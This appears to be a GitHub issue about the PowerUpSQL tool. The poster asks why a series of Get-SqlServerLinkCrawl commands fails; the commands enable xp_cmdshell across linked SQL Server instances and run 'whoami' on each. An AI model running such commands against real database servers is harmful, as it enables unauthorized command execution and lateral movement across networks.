Open
Description
I spent some time trying to figure out the correct syntax to use with Get-SqlServerLinkCrawl to enabled xp_cmdshell and run system commands on all the DB on the links, but no luck. I gave up and switched to impacket mssql instead.
The commands I tried are as follows:
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
-Query "EXECUTE('sp_configure ''show advanced options'', 1')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
-Query "EXECUTE('RECONFIGURE')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
-Query "EXECUTE('sp_configure xp_cmdshell, 1')"
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
-Query "EXECUTE('RECONFIGURE')"
Get-SQLServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" `
-Query "EXECUTE('xp_cmdshell whoami')"If someone could please let me know what is wrong with the above, that would be super!
Metadata
Assignees
Labels
No labels